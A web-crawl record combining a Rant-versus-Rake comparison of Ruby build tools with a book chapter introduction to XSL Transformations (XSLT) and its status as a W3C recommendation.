Rake as a library. Rant solves this problem by evaluating Rantfiles in a special context (with instance_eval). - Rake uses global variables and class/class instance variables to store state (tasks, etc.). The effect of this is, that you can have only one Rake application per Ruby interpreter (process) at a time. Rant stores application state in a class instance. It is possible to instantiate as many "Rant applications" at the same time as needed. On the other hand, there is currently no public and documented interface to do so (but it will come at least with Rant 1.0.0).
http://make.rubyforge.org/files/doc/rant_vs_rake_rdoc.html
crawl-002
refinedweb
664
66.33
#include <dri_interface.h> Screen dependent methods. This structure is initialized during the __DRIdisplayRec::createScreen call. Functions associated with MESA_allocate_memory. Method to create the private DRI context data and initialize the context dependent methods. Method to create the private DRI drawable data and initialize the drawable dependent methods. Method to destroy the private DRI screen data. Method to return a pointer to the DRI drawable data. Get the number of vertical refreshes since some point in time before this function was first called (i.e., system start up). Opaque pointer to private per screen direct rendering data. NULL if direct rendering is not supported on this screen. Never dereferenced in libGL.
http://www.dpi.inpe.br/terralib/html/v410/struct_____d_r_iscreen_rec.html
CC-MAIN-2013-20
refinedweb
110
53.98
Spring for Apache Hadoop 2.1 Released It was about six months ago that we started work on the 2.1 version of Spring for Apache Hadoop. We are now pleased to announce the general availability of version 2.1.0. Beginning with the Spring for Apache Hadoop 2.1 version, we now only support Hadoop 2.0 APIs and no longer provide backwards compatibility with older Hadoop v1 distributions. If you need support for older Hadoop versions please use the 2.0.4 or 1.1.0 versions of Spring for Apache Hadoop. The main new features for the 2.1 version are: Configuration and Boot support: - New @Configuration changes and improvements to the Boot auto configuration features. A good example of this support can be seen in the boot-fsshell DemoApplicationexample app @SpringBootApplication public class DemoApplication implements CommandLineRunner { @Autowired private FsShell shell; @Override public void run(String... args) { for (FileStatus s : shell.lsr("/tmp")) { System.out.println("> " + s.getPath()); } } public static void main(String[] args) { SpringApplication.run(DemoApplication.class, args); } } For the full sample, go to Store: - Added support for append mode in the HDFS store writers. - The Kite SDK dataset support updated to 0.17.0. This means there are some changes to the API. The use of a namespace in addition to the basePath is now mandatory. The DatasetTemplate now also uses ViewCallbacks instead of a partition expression for querying the data. YARN: - Support for container grouping and clustering in Spring YARN, which brings functionality for running multiple container types within a single YARN application. - A new REST API for submitted apps and an improved application model with new client side commands and a command line shell. - To see examples of these features look at the yarn-store-groupsexample app or at the Spring XD implementation for running on YARN. We continue to update support for the latest Hadoop versions. We now provide “flavored” versions for the following distributions: - Apache Hadoop 2.4.1 (2.1.0.RELEASE-hadoop24) - Apache Hadoop 2.5.2 (2.1.0.RELEASE-hadoop25) - Apache Hadoop 2.6.0 (2.1.0.RELEASE) - Pivotal HD 2.1 (2.1.0.RELEASE-phd21) - Cloudera CDH5 5.3.0 (2.1.0.RELEASE-cdh5) - Hortonworks HDP 2.2 (2.1.0.RELEASE-hdp22) The default distribution version is now Apache Hadoop 2.6.0. Going forward With the Hadoop ecosystem moving at a rapid pace, we hope that more frequent releases will help us keep up. For the next version we are planning on adding the following: - Better Java Configuration support. - Add better support for for Hiveserver2 including a batch tasklet. - Basic support for a batch tasklet to run Spark apps. - Better boot support throughout the different modules. - Improved security support (i.e. the YARN Boot CLI interaction, etc). - Enhancements to have seamless integration with spring-cloud components (i.e. spring-cloud-cluster). Please provide feedback and feature requests via JIRA issues or GitHub issues (see project page for links). The project page is at -
http://spring.io/blog/2015/02/09/spring-for-apache-hadoop-2-1-released
CC-MAIN-2017-22
refinedweb
502
60.72
Any tags you like Note: Many general interest features are already on Map Features and it is recommended to use the tagging given there. Otherwise other users might eventually convert your contributions to fit that scheme. Contents So you've followed good practice and searched the Wiki, - You want to gather feedback from fellow mappers, including people from different regions . E.g., adding the location of a WLAN hotspots base station is considered acceptable, but tagging many nodes around it with the perceived signal levels is unwanted. Such information is better stored in a separate service. Please consider community consensus documented on the Good practice page regarding verifiability. Do not map historic, temporary or hypothetical features, opinionated data like ratings, or legislation.. Depending if what you want fits into some already defined category you may define a new main key, a new value for an existing key, a new property modifying one or more key/value combinations or a new method of refinement. If in doubt whether to define something entirely new or use some existing combination with new properties or refinements consider: - new properties should not modify established features in ways that would contradict common sense expectation of them The strings chosen for the key part have some conventional forms: - Ideally, a key is one word, in lowercase, using British English if possible. - - Relatively uncommon. Pattern 2, but done in a generative manner where sub-parts refer to other defined keys. This is almost meta-tagging. Almost. - source:name=* - the source for the name tag is ... - source:ref=* - the source for the ref tag is ... Syntactic conventions for new values The format and conventions depend on whether the tag represents a feature or a property. - A tag can represent either a separate feature (like highway) or a property of a feature (like width). - Properties can have a large number of possible values, or can be numeric (e.g. width=2). - Features often take values which further refine the category of map feature (e.g. highway=motorway). - For feature tags, the value follows formatting conventions similar those used for keys: - Ideally, the value of a feature tag is one word, in lowercase, using British English if possible. - When that can't be the case, the value of a feature tag should be one concept, whose words are underscore_separated. - Sometimes the semicolon ";" is interpreted as multi-value separator - see Semi-colon value separator. Refinement and namespaces There's a common pattern of iterative refinement in use in many tagging schemes, which has the advantage that the scheme can grow over time to be more and more descriptive whilst still being backwards-compatible: Beware of conflicts with other tagging schemes when following this pattern. Refinement can be also done by the means using namespaces. Characters You can use any Unicode characters (UTF-8) as you like. In practice, most keys (such as highway) and classification values (such as trunk_link) uses lower case ASCII) use any characters you can think of. Avoid whitespace at the beginning and end of values. - Just Map - Good Practice - Proposal process - How to invent tags by Jochen Topf
https://wiki.openstreetmap.org/wiki/Any_tags_you_like
CC-MAIN-2020-24
refinedweb
520
51.89
you've ever used the stdlib.h rand() function, you've probably noticed that every time you run your program, it gives back the same results. This is because, by default, the standard (pseudo) random number generator is seeded with the number 1. To have it start anywhere else in the series, call the function srand(unsigned int seed). For the seed, you can use the current time in seconds. #include <time.h> // At the beginning of main, or at least before you use rand() srand(time(NULL)); srand(time(NULL)); Note that this seeds the generator from the current second. This means that if you expect your program to be rerun more than once a second (some kind of batch processor or simulator maybe), this will not be good enough for you. A possible workaround is to store the seed in a file, which you then increment every time the program is run. When you're using random numbers, be very considerate about what you're using them for, and how random they need to be. The standard library rand() function may or may not be good enough for what you're using it for (ie gambling, cryptogaphy,
http://ctips.pbworks.com/w/page/7277631/SeedRand
CC-MAIN-2020-34
refinedweb
199
69.41
Computes an inclusive scan (partial reduction) #include <mpi.h> int MPI_Scan::Scan_Scan is used to perform an inclusive prefix reduction on data distributed logicals, where the logicals delineate the various segments of the scan. For example, values v1 v2 v3 v4 v5 v6 v7 v8 logicals 0 0 1 1 1 0 0 1 result v1 v1+v2 v3 v3+v4 v3+v4+v5 v6 v6+v7 v8 The result for rank j is thus the sum v(i) + ... + v(j), where i is the lowest rank such that for all ranks n, i <= n <= j, logical(n) = logical(j). The operator that produces this effect is [ following:); MPI_Get_address(a.log, disp + 1); base = disp[0]; for (i = 0; i < 2; ++i) disp[i] -= base; MPI_Type_struct(2, blocklen, disp, type, &sspair); MPI_Type_commit(&sspair); /* * scanning
https://www.carta.tech/man-pages/man3/MPI_Scan.openmpi.3.html
CC-MAIN-2018-51
refinedweb
134
60.14
Results 1 to 3 of 3 I'm a newbie in linux kernel programming and needed some help. I need to write a Linux kernel module that creates a block device /dev/theprocs that "contains" the process list. ... - Join Date - Jun 2014 - 1 Getting killed message when doing cat /dev/myModule I need to write a Linux kernel module that creates a block device /dev/theprocs that "contains" the process list. So I have written some code which gives me the list of the current processes. The only problem I am running into is displaying the list in stdout(the terminal) instead of the kernel log file. When I cat /dev/theprocs first time, its gives me the message "Killed". When I remove and install the module again; it works. So it works every alternate time. I need help in solving this issue. Code: #include <linux/module.h> #include<linux/sched.h> #include <linux/string.h> #include <linux/fs.h> #include <asm/uaccess.h> #include <linux/proc_fs.h> #include <linux/kernel.h> MODULE_LICENSE("GPL"); MODULE_DESCRIPTION("Device Driver Demo"); MODULE_AUTHOR("Joey"); static int dev_open(struct inode *, struct file *); static int dev_rls(struct inode *, struct file *); static ssize_t dev_read(struct file *, char *, size_t, loff_t *); int len,temp; char msg[3000]; int totalLen; static struct file_operations fops = { .read = dev_read, .open = dev_open, .release = dev_rls, }; int init_module(void) { int t = register_chrdev(101,"theprocs",&fops); if(t<0) printk(KERN_ALERT "Device failed to register!"); else printk(KERN_ALERT "Registered device...\n"); return t; } static int dev_open(struct inode *inod, struct file *fil) { struct task_struct *task; for_each_process(task) { printk("%s [%d]\n",task->comm, task->pid); strcat(&msg[0],task->comm); strcat(&msg[0],"\n"); totalLen = totalLen + strlen(task->comm); } strcat(&msg[0],"\0"); len=strlen(msg); temp=len; printk("%s [%d]\n",task->comm , totalLen); return 0; } void cleanup_module(void) { unregister_chrdev(101,"theprocs"); } static ssize_t dev_read(struct file *filp,char *buf,size_t count,loff_t *offp) { if(count>temp) { count=temp; } temp=temp-count; copy_to_user(buf,msg, count); if(count==0) temp=len; return count; //return 0; } static int dev_rls(struct inode *inod, struct file *fil) { printk(KERN_ALERT"Done with device\n"); return 0; } - Join Date - Dec 2011 - Location - Turtle Island West - 413 I'm no kernel guru, but... You say you need to create a *block* device, but aren't you actually creating a *character* device? Also I'm not so sure about that for_each_process(task) bit. It seems a bit grotty and strcat is dangerous. Use strncat and check the lengths for sanity. You could be getting some unexpected stuff. msg[] only holds 3000 bytes. That's not very big. It's only 37.5 lines of a 80 column display. You never check to see if task is NULL. Dereferencing a NULL pointer goes straight to segfault with no stops on the way. - Join Date - Apr 2009 - Location - I can be found either 40 miles west of Chicago, in Chicago, or in a galaxy far, far away. - 11,655 Miven is correct. Normally you can't just cat from /dev/blockdevid unless your kernel driver code has some ability to deal with such requests. Without your full driver code, there isn't much we can tell you.Sometimes, real fast is almost as good as real time. Just remember, Semper Gumbi - always be flexible!
http://www.linuxforums.org/forum/kernel/201929-getting-killed-message-when-doing-cat-dev-mymodule.html
CC-MAIN-2014-42
refinedweb
549
58.69
Python Debugging¶ Description Using Python command-line debugger ( Pdb) to debug Plone and Python applications. Introduction¶ The Python Debugger ( Pdb) is an interactive command-line debugger. Plone also has through-the-web-browser Pdb debugging add-on products. Note Pdb is not the same as the Python interactive shell. Pdb allows you to step through the code, whilst the Python shell allows you to inspect and manipulate objects. If you wish to play around with Zope in interactive Python shell or run scripts instead of debugging (exceptions), please read Command line documentation. Usage¶ - # Go to your code and insert the statement import pdb; pdb.set_trace()at the point where you want have a closer look. Next time the code is run, the execution will stop there and you can examine the current context variables from a Python command prompt. # After you have added import pdb; pdb.set_trace() to your code, stop Zope and start it in the foreground using the bin/instance fg command. Example: class AREditForm(crud.EditForm): """ Present edit table containing rows per each item added and delete controls """ editsubform_factory = AREditSubForm template = viewpagetemplatefile.ViewPageTemplateFile('ar-crud-table.pt') @property def fields(self): # # Execution will stop here and interactive Python prompt is opened # import pdb ; pdb.set_trace() constructor = ARFormConstructor(self.context, self.context.context, self.request) return constructor.getFields() Printing Objects¶ Example: >>> from pprint import pprint as pp >>> pp folder.__dict__ { '_Access_contents_information_Permission': ['Anonymous', 'Manager', 'Reviewer'], '_List_folder_contents_Permission': ('Manager', 'Owner', 'Member'), '_Modify_portal_content_Permission': ('Manager', 'Owner'), '_View_Permission': ['Anonymous', 'Manager', 'Reviewer'], '__ac_local_roles__': {'gregweb': ['Owner']}, '_objects': ({'meta_type': 'Document', 'id': 'doc1'}, {'meta_type': 'Document', 'id': 'doc2'}), 'contributors': (), 'creation_date': DateTime('2005/02/14 20:03:37.171 GMT+1'), 'description': 'Dies ist der Mitglieder-Ordner.', 'doc1': <Document at doc1>, 'doc2': <Document at doc2>, 'effective_date': None, 'expiration_date': None, 'format': 'text/html', 'id': 'folder', 'language': '', 'modification_date': DateTime('2005/02/14 20:03:37.203 GMT+1'), 'portal_type': 'Folder', 'rights': '', 'subject': (), 'title': "Documents", 'workflow_history': {'folder_workflow': ({'action': None, 'review_state': 'visible', 'comments': '', 'actor': 'gregweb', 'time': DateTime('2005/02/14 20:03:37.187 GMT+1')},)} } Commands¶ Type the command and hit enter. ``s`` step into, go into the function in the cursor ``n`` step over, execute the function under the cursor without stepping into it ``c`` continue, resume program ``w`` where am I? displays current location in stack trace ``b`` set breakpoint ``cl`` clear breakpoint ``bt`` print stack trace ``up`` go to the scope of the caller function ``pp`` pretty print object Continue execution until the line with the line number greater than the current one is reached or when returning from current frame. Snippets¶ Output object’s class: (Pdb) print obj.__class__ Output object attributes and methods: (Pdb) for i in dir(obj): print i Print local variables in the current function: (Pdb) print locals() Dumping incoming HTTP GET or HTTP POST: (Pdb) print "Got request:" (Pdb) for i in self.request.form.items(): print i Executing code on the context of the current stack frame: (Pdb) from pprint import pprint as pp (Pdb) pp my_tags ['bar', 'barbar'] (Pdb) !my_tags = ['foo', 'foobar'] (Pdb) pp my_tags ['foo', 'foobar'] Note The example above will modify the previous value of the variable my_tags in the current stack frame. Start Debugger When Exception Is Raised¶ Browser¶ You can start interactive through-the-browser Python debugger when your site throws an exception. Instead of getting “We’re sorry there seems to be an error…” page you get a Pdb prompt which allows you to debug the exception. This is also known as post-mortem debugging. This can be achieved with ` Products.PDBDebugMode` add-on. By using this add-on, you have a /@@pdb view that you can call on any context too. Note Remember that this add-on hooks into the “error_log” exception handling. If you don’t want to enter into Pdb when an specific exception is raised, like Unauthorized, you should edit it in the ZMI. PDBDebugMode is not safe to install on the production server due to sandbox security escape. Command Line¶ Note This cannot be directly applied to a web server, but works with command line scripts. This does not work with Zope web server launch as it forks a process. Example: python -m pdb myscript.py Hit c and enter to start the application. It keeps running, until an uncaught exception is raised. At this point, it falls back to the Pdb debug prompt. For more information see Interactive Debugging¶ You can use interactive debugging via bin/{client1|instance} debug (use the name of the instance script you’re using in your buildout). It gives you an interactive Python interpreter with access to Zope’s root object (bound to “app”). In the interpreter, you can do “normal” Python debugging. Alternative Debugger¶ Some of these options (like q) are complementary to Pdb itself. We suggest you to try the alternatives here, some features (like tab completion and syntax highlighting) are hard to live without after getting used to them. ipdb¶ ipdb exports functions to access the IPython debugger, which features tab completion, syntax highlighting, better tracebacks, better introspection with the same interface as the Pdb module. If you install iw.debug with ipdb, you can call ipdb in any object of your instance, by adding /ipdb to any url. pdbpp¶ This module is an extension of the Pdb module of the standard library. It is meant to be fully compatible with its predecessor, yet it introduces a number of new features to make your debugging experience as nice as possible. pdb++ is meant to be a drop-in replacement for Pdb. debug¶ Instead of import pdb;pdb.set_trace() you can use use import debug, then it automatically enters into ipdb. You can do /bin/instance debug and then call import debug as well. pudb¶ It’s an alternative to Pdb with a curses interface. commands. Use search to find relevant source code, or use “m” to invoke the module browser that shows loaded modules, lets you load new ones and reload existing ones. Breakpoints can be set) q¶ Quick and dirty debugging output. All output goes to /tmp/q, which you can watch with this shell command: tail -f /tmp/q. That way you can print variables, functions, etc. Check it’s documentation for more examples. Debugging Page Templates¶ Since Plone 5, Chameleon (five.pt) is used for the TAL engine. When using Chameleon, we can use the following snippet to debug page templates: Example: <?python locals().update(econtext); import pdb; pdb.set_trace() ?> However, this doesn’t work in skin templates and in TTW (Through-The_Web) templates. If you want a full explanation of how this snippet works (specially about the context variable), check. Debugging ZMI Python Script¶ If you install in your instance, you can import Pdb inside a Python Script. Browser Extensions¶ If you need to call /@@reload (if you installed plone.reload) or ?diazo on your current Plone, you can use the Plone Reloader extension. This extension displays the plone.reload form in a popup so you can reload your current Plone instance code without switching to another tab. It also provides buttons to open diazo off/debug Urls.
https://docs.plone.org/develop/debugging/pdb.html
CC-MAIN-2020-16
refinedweb
1,179
56.45
A technically this problem is not really one of tokenization but rather just classifying the input with a common name, but the technique can be fairly easily extended. In PHP the solution is courtesy of the third argument to preg_match(), for example; $inputs = array( 'Kanton Zuerich', 'Frauenfeld Regione', 'Fricktal Gruppe'); foreach ( $inputs as $input ) { preg_match("/(cantone?|kanton)|(regione?)|(groupe?|grupp(?:o|e))/i", $input, $matches); print_r($matches); } I get output like; Array ( [0] => Kanton [1] => Kanton ) Array ( [0] => Regione [1] => [2] => Regione ) Array ( [0] => Gruppe [1] => [2] => [3] => Gruppe ) Notice how the first element of this array in always what I matched while elements indexed 1+ correspond to the position of subpattern I matched against, from left to right in the pattern - this I can use to tell me what I actually matched e.g.; $inputs = array( 'Kanton Zuerich', 'Frauenfeld Regione', 'Fricktal Gruppe'); $tokens = array('canton','region','group'); // the token names foreach ( $inputs as $input ) { if ( preg_match("/(cantone?|kanton)|(regione?)|(groupe?|grupp(?:o|e))/i", $input, $matches) ) { foreach ( array_keys( $matches) as $key) { if ( $key == 0 ) { continue; } // skip the first element // Look for the subpattern we matched... if ( $matches[$key] != "" ) { printf("Input: '%s', Token: '%s'\n", $input, $tokens[$key-1]); } } } } Which gives me output like; Input: 'Kanton Zuerich', Token: 'canton' Input: 'Frauenfeld Regione', Token: 'region' Input: 'Fricktal Gruppe', Token: 'group' …so I’m now able to classify the input to one of a set of known tokens and react accordingly. Most regex. apis provide something along this lines, for example here’s the same (and much cleaner) in Python, which is what I actually used on this problem; import re p = re.compile('(cantone?|kanton)|(regione?)|(groupe?|grupp(?:o|e))', re.I) inputs = ('Kanton Zuerich', 'Frauenfeld Regione', 'Fricktal Gruppe') tokens = ('canton','region','group') for input in inputs: m = p.search(input) if not m: continue for group, token in zip(m.groups(), tokens): if group is not None: print "Input: '%s', Token: '%s'" % ( input, token ) Could be reduced further using list comprehensions but don’t think it helps readability in this case. An alternative problem to give you a feel for how this technique can be applied. Let’s say you want to parse an HTML document and list a subset of the block level vs. the inline level tags it contains. You might do this with two sub-patterns e.g. (</?(?:div|h[1-6]{1}|p|ol|ul|pre).*?>)|(</?(?:span|code|em|strong|a).*?>) (note this regex as-is is geared to python’s idea of greediness - you’d need to change it for PHP) leading to something like this is python; p = re.compile('(</?(?:div|h[1-6]{1}|p|ol|ul|pre).*?>)|(</?(?:span|code|em|strong|a).*?>)') for match in p.finditer('foo <div> test <strong>bar</strong> test 1</div> bar'): print "[pos: %s] matched %s" % ( match.start(), str(match.groups()) ) The call to match.groups() returns a tuple which tells you which sub pattern matched while match.start() tells you the character position in the document where the match was made, allowing you to pull substrings out of the document. January 19th, 2008 at 3:23 am Another good way to tokenize is with preg_split() and PREG_SPLIT_DELIM_CAPTURE option. See my Regex Clinic slides on January 19th, 2008 at 5:07 am Thanks to guys like you Andrei PHP is on the top. Thanks man! January 19th, 2008 at 6:35 am PHP_LexerGenerator takes this principle and combines it with the idea of states to implement a re2c-like lexer generator grammar for PHP. January 19th, 2008 at 9:21 am Interesting fact (well, I think so at least): the Django template engine uses a single regular expression to tokenize the entire template. That’s the main reason it’s so fast compared to many of the other Python template languages out there. Take a look at this: (in particular line 90, where tag_re is declared). January 20th, 2008 at 12:55 pm a single, long regular expression can often be more inefficient than small regular expressions due to backtracking. January 20th, 2008 at 7:35 pm Interesting point although that might well be outweighed having to make additional calls in PHP or Python, depending on what you’re doing. August 26th, 2008 at 8:25 pm
http://www.sitepoint.com/blogs/2008/01/19/tokenization-using-regular-expression-sub-patterns/
crawl-002
refinedweb
711
50.06
#include <nrt/Core/Design/Watchdog.H> Launch a function after some amount of time has passed during which no reset was received. A countdown over a given delay passed at construction is initiated, and the function passed at construction will be called, unless the countdown is reset by calling the reset() function. A call to reset() simply sets back the clock to the full delay, and the countdown starts again from there (i.e., it does not stop the clock). This class is thread-safe, i.e., multiple threads can call reset() concurrently without having to worry about locking. If the countdown ever reaches 0, the function will be called in a separate thread. Definition at line 57 of file Watchdog.H. Constructor, setting the time delay and function that will be launched should the delay expire. If counting down, wait until we timeout, otherwise (dormant state) return immediately. This function is guaranteed to not block forever (stuck in dormant state) as it will return immediately if dormant, otherwise it will wait until the next timeout and return. It can be used if you need to wait until a timeout gets triggered, but you do not want to wait forever in case we are dormant.
http://nrtkit.net/documentation/classnrt_1_1Watchdog.html
CC-MAIN-2018-51
refinedweb
205
63.29
This post is inspired by a question asked in my blog this morning, about handling file-not-found errors from an SSIS package. A typical use case is as follows. An SSIS package is scheduled to run at every X minutes which processes files coming into a folder. However, a file may not be present every time the package runs. If a file is available it should be processed. If the file is not found, the package should exit gracefully, without generating an error. There may be different ways of handling this. A few that I am aware of are This post tries to demonstrate the option #1 listed above: handling the file-not-found case using a script task. Checking the existence of the file using a script task To start with, let us create two variables; one for the file name and another a boolean flag that indicates whether the file exists or not. The script task will turn this variable into true or false depending upon the existence of the file. Execution will continue to the next step only if the file exists. Next, let us add a script task and data flow task into the package designer. Now, let us add a constraint that ensures that the data flow task is executed only if the value of the variable Exists is set to true. Keep in mind that we will change the value of this variable from the script task depending upon the presence of absence of the file. Let us now proceed with writing the script. Before we actually move into the script designer, open the properties of the script task and set the read-only and read-write variables. Next, click on the button edit script which will open the script editor. To start with we will need the following using statement. using System.IO; Next, add the following code into the main() function. string file = Dts.Variables["User::FileName"].Value.ToString(); if (File.Exists(file)) { Dts.Variables["User::Exists"].Value = true; } else { Dts.Variables["User::Exists"].Value = false; } Dts.TaskResult = (int)ScriptResults.Success; Well, we are now ready for testing. Run the code in the presence and absence of the input file and ensure that it works.
http://beyondrelational.com/modules/2/blogs/28/Posts/15790/ssis-handling-package-failures-when-the-input-file-is-not-found.aspx
CC-MAIN-2017-09
refinedweb
374
74.19
Thanks to @NathanaelA pledge on Patreon we just received a wonderful addition: :sparkles: Monaco support (the editor that powers VS Code) :sparkles: Live Demo: Demo Code: Binding repository: @calibr Yes, I broke encoding. These are my final fixes to create a stable API to Yjs Thanks for your feedback @canadaduane :) You can absolutely do that in both v13 and v12. Shared types are just data types and of course you can nest them. But it may take some time to get used to the concept of shared data types. You should just start and observe the changes as you are doing them. Here is a template to create a file system using Y.Map as the directory and Y.Text as files. This will work in Yjs version 13 (in beta): const yMap = doc.getMap('my-directory') const file = new Y.Text() yMap.set('index.js', file) new TextareaBinding(file, document.querySelector('textarea')) yMap.set('index.js', file) import React, {Component} from 'react'; import * as Y from 'yjs' import { WebsocketProvider } from 'y-websocket' const doc = Y.Doc() const provider = new WebsocketProvider('', 'roomname') provider.sync('doc') const ytext = doc.getText('my resume') class App extends Component { render() { return (<div>test</div>); } } export default App; Thanks @crazypenguinguy I made some mistakes i the documentation. For example the url must be a ws:// or wss:// url. I corrected it. Let me know if something else is unclear. Here is the fixed code for your demo: import React, { Component } from "react"; import ReactDOM from "react-dom"; import * as Y from "yjs"; import { WebsocketProvider } from "y-websocket"; const doc = new Y.Doc(); //const doc = new Y.Doc() const provider = new WebsocketProvider("ws://localhost:1234", "roomname", doc); const ytext = doc.getText("my resume"); class App extends Component { render() { return <div>test</div>; } } export default App; const rootElement = document.getElementById("root"); ReactDOM.render(<App />, rootElement); Good questions. Comparing Yjs and Automerge: • Both projects provide easy access to manipulating the shared data. Automerge's design philosophy is that state is immutable. In Yjs, state is mutable and observable. • Automerge has more demo apps where state is shared to build some kind of application. But in theory, you could implement shared text editing with Automerge. • Yjs is more focused on shared editing (on text, rich text, and structured content). It has lots of demos for different editors (quill, ProseMirror, Ace, CodeMirror, Monaco, ..). • I spent a lot of time to optimize Yjs to work on large documents. While Automerge works fine on small documents, it has serious performance problems as the document grows in size. • Yes, Automerge has support for hypermerge/DAT. I am also looking into it, as it seems like a really cool idea. I'm currently exploring multifeed[) for that. On the other hand Yjs has support for IPFS. Yjs & Electron: No problem here in general. You'll need to polyfill WebSocket / WebRTC support in electron. There is ws for WebSocket support and node-webrtc for WebRTC. Query Index: There is nothing like that to my knowledge. But maybe you could have a look at GUN @calibr I have no experience with document indexing. Thanks for sharing your experience. @canadaduane Thanks for your appreciation :) I was referring to the frontend of the shared editing framework. Yjs exposes mutable types (e.g. Y.Array). Automerge exposes immutable json-like objects. In Yjs, the operation log is not immutable. I.e. it may decrease in size when you delete content. I describe some optimizations I do in the v13 log, but let me know if you want to know more. About P2P electron apps: DAT is a very ambitious project that wants to share many, large files in a distributed network. Compared to WebRTC, UDP connections are initialized much faster and are better suited for their use-case (e.g. walking through peers of the DHT). However, If you only want to share a single document, WebRTC will work just fine and are also supported in the browser. @/all The Quill Editor binding was just added for v13 including shared cursors and many additional consistency tests. Demo: y-quill: userOnly: true(see).
https://gitter.im/y-js/yjs?at=5cf5313582c2dc79a543c6ce
CC-MAIN-2022-27
refinedweb
683
68.06
convert calendar time to a broken-down time #include <time.h> struct tm * gmtime( const time_t *timer ); struct tm *_gmtime( const time_t *timer, struct tm *tmbuf ); The gmtime() functions convert the calendar time pointed to by timer into a broken-down time, expressed as Coordinated Universal Time (UTC) (formerly known as Greenwich Mean Time (GMT)). The function _gmtime places the converted time in the tm structure pointed to by tmbuf, and the gmtime() function places the converted time in a static structure that is re-used each time gmtime() is called. The time set on the computer with the QNX date command reflects Coordinated Universal Time (UTC). The environment variable TZ is used to establish the local time zone. See the Global Data and the TZ Environment Variable chapter for a discussion of how to set the time zone. A pointer to a structure containing the broken-down time. #include <stdio.h> #include <time.h> void main() { time_t time_of_day; char buf[26]; struct tm tmbuf; time_of_day = time( NULL ); _gmtime( &time_of_day, &tmbuf ); printf( "It is now: %.24s GMT\n", _asctime( &tmbuf, buf ) ); } produces the output: It is now: Fri Dec 25 15:58:27 1987 GMT asctime(), clock(), ctime(), difftime(), localtime(), mktime(), strftime(), time(), tzset() The tm structure is described in the section on <time.h> in the Header Files chapter.
https://users.pja.edu.pl/~jms/qnx/help/watcom/clibref/src/gmtime.html
CC-MAIN-2022-33
refinedweb
220
60.75
Subject: Re: [boost] [SORT] Parallel Algorithms From: Francisco José Tapia (fjtapia_at_[hidden]) Date: 2014-12-23 18:00:01 Hi Steven Thanks by your ideas. I will check. Now I am designing, developing and testing several improvements for the algorithms. When finish I will prepare a clear and easy interface for to transform any sort algorithm, even the parallel, in a indirect sort, and prepare a brief document where explain how to do. Perhaps it will be a good moment for to move all the code to the namespace boost::sort Only after these things, I will begin to prepare the big benchmark. And then, I would like your experience and opinion. My idea is to make the benchmark running in a easy way, if we want know the opinion and results of other members of the Boost community, we must try to simplify their work. I will inform of my progress, but I must travel for to be with my family, and until January, I didn't run at full speed. Happy Christmas. My best wishes for you and the Boost community Francisco 2014-12-23 12:49 GMT+01:00 Steven Ross <spreadsort_at_[hidden]>: > Francisco, > > On Tue Dec 23 2014 at 3:31:32 AM Francisco José Tapia <fjtapia_at_[hidden]> > wrote: > > > We can do too a benchmark with variable lenght elements with strings. > > > > If you prepare the operations for to do in that test, I can prepare an > > additional benchmark with all the algorithms and your operations. > > > > After all, we see and take a decision > > > > Yours > > > > Francisco > > > > The approach I've used with the boost::sort library is to set up the > benchmark tests so that they read in a file of random data generated by a > single application (randomgen), or any other file that is passed in for > testing, and they write out their results to file. This enables better > testing and debugging in case there are any problems (I directly diff the > sort results when I can expect them to be identical; tune.pl does this > automatically). > I would prefer if you used stringsample.cpp and int64.cpp as examples of > how to do this, and downloaded the boost sort library and added any > modifications you need into that code. The library has a tune.pl script > that runs the benchmarks. It may be helpful to write some utility > templated funciton to switch between different algorithms, instead of the > current approach of using a "-std" switch to use std::sort. > > There is a README there on how to install it using modular boost. > > _______________________________________________ > Unsubscribe & other changes: > > Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk
https://lists.boost.org/Archives/boost/2014/12/218438.php
CC-MAIN-2019-43
refinedweb
453
61.97
PyMaemo/Python-GPSbt [edit] Introduction Python-GPSbt is a binding, based on libgpsbt, that provides access to GPS data through osso-gpsd. It only depends on a Bluetooth GPS device already paired. How it works Libgpsbt allows to connect with Bluetooth GPS devices and uses osso-gpsd daemon to provide a socket where you can send/receive information. After a gps.start() its possible to send commands (trhough query) and receive data from GPS. Almost all information acquired from socket is stored inside a structure called 'fix'. To fill it just call the get_fix(). It does a query to get all necessary information from GPS device. To finish the Bluetooth connection just call the gps.stop() method, providing the context (returned by gps.start()). API gpsbt.start- establishes a new GPS connection and returns a context. This one is is used to inform stop method what connection to be ended. context = gps.start() gpsbt.stop- ends an active connection, passed through the context. gps.stop(context) gpsbt.gps()- the class that gets information from GPS. Through it its possible to query, get_fix, get_position, etc. gpsbt.gps.get_fix()- fills in the 'fix' structure with GPS data. The fields are: mode, time, ept, latitude, longitude, eph, altitude (meters), epv, track (degrees from true north), speed (knots), climb (meters per second), epd, eps and epc. gpsbt.gps.get_position()- its a shortcut to return (latitude, longitude) info. gpsbt.gps.query()- allows user to send one letter commands to the GPS device. Its possible to group a sequence of commands to send, e.g.: gpsbt.gps.query('a')fills in the altitude field of 'fix' structure gpsbt.gps.query('as')fills in the altitude and speed fields gpsbt.gps.satellites- contains a list of detected satellites, including information about usage and quality. [edit] Example The code below shows how to connect with a GPS device, get data and close this connection: import gpsbt import time def main(): context = gpsbt.start() if context == None: print 'Problem while connecting!' return # ensure that GPS device is ready to connect and to receive commands time.sleep(2) gpsdevice = gpsbt.gps() # read 3 times and show information for a in range(4): gpsdevice.get_fix() time.sleep(2) # print information stored under 'fix' variable print 'Altitude: %.3f'%gpsdevice.fix.altitude # dump all information available print gpsdevice # ends Bluetooth connection gpsbt.stop(context) main() Download source code here. - This page was last modified on 22 June 2010, at 11:51. - This page has been accessed 2,869 times.
http://wiki.maemo.org/PyMaemo/Python-GPSbt
CC-MAIN-2017-34
refinedweb
416
51.65
XSL Transformations In this chapter, I’m going to start working with the Extensible Styles Language (XSL). XSL has two parts—a transformation language and a formatting language. The transformation language lets you transform documents into different forms, while the formatting language actually formats and styles documents in various ways. These two parts of XSL can function quite independently, and you can think of XSL as two languages, not one. In practice, you often transform a document before formatting it because the transformation process lets you add the tags the formatting process requires. In fact, that is one of the main reasons that W3C supports XSLT as the first stage in the formatting process, as we’ll see in the next chapter. This chapter covers the transformation language, and the next details the formatting language. The XSL transformation language is often called XSLT, and it has been a W3C recommendation since November 11, 1999. You can find the W3C recommendation for XSLT at. XSLT is a relatively new specification, and it’s still developing in many ways. There are some XSLT processors of the kind we’ll use in this chapter, but bear in mind that the support offered by publicly available software is not very strong as yet. A few packages support XSLT fully, and we’ll see them here. However, no browser supports XSLT fully yet. 